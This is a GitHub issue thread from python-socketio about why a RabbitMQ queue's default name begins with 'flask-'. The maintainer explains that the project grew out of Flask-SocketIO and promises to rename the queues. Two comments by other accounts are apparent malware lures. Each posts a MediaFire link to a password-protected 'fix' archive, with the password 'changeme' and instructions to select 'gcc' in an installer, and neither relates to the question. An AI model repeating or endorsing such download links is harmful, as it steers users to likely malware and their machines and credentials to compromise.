### ISSUE TITLE
RabbitMQ queue default name

### ISSUE THREAD

**Issue by yuanjiushao** [miguelgrinberg/python-socketio#1377]
![image](https://github.com/user-attachments/assets/d4078150-e934-4f63-9eb6-fe88797f9ffb)
Why is the queue default name 'flask-' in the Django framework I am using?

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by miguelgrinberg** [comment]
Oh, this is interesting, not sure how nobody else noticed this. Many years ago, this project originated as a generalization of Flask-SocketIO, which is specific to Flask. I missed changing those queue names, they should be `socketio` or `python-socketio`. I will update them!

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
